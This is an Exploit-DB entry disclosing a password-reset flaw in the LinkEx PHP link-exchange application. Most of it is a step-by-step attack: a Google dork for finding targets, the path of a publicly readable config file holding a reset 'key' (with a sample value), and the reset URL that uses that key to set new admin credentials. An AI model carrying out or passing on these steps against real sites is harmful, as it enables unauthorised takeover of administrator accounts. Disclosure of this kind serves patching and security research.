LinEx - Password Reset

EDB-ID:

32561

CVE:



Platform:

PHP

Published:

2014-03-27

# Exploit Title: LinEx All Versions Password Reset Vulnerability
# Google Dork:  linkex.dk 2006-2011
# Date: 15/01/2014
# Exploit Author: N B Sri Harsha ( Reconnect Gray hat )
# Vendor Homepage: http://linkex.dk/
# Software Link: http://linkex.dk/releases/linkex.20120508.zip
# Version: All Versions


LinkEx Is A Open Source Web Application For Exchanging link ,  Which Most
Of The Porn Sites Uses it ,

1) First GO Here http://site.com/linkex/?page=admin
2) Click On Forgot password and enter the captcha
3) Go Here >> site.com/linkex/data/config/config
Note down the " key " parameter
ie :- "key";s:32:"36d1dd98c84e643236216449e96bed0d"
4) Now Use the Key Here >> site.com/linkex/?page=resetpassword&key=[key]
5) Thats It U Will Asked For New Username And Password


Shouts to :-  | ROHIT ROY | GRAY CODE | Moni HBH | Yamraaj | HALK | Le3to |
HaXarwOw | COSMO | 404 !-!@!2$!-!@ | Root Breaker | N3O | Godhacker |
3QUIVOR | Dmostwanted | r00t.hc0n | hun73r_ihos |

-- 
Regards
N B Sri Harsha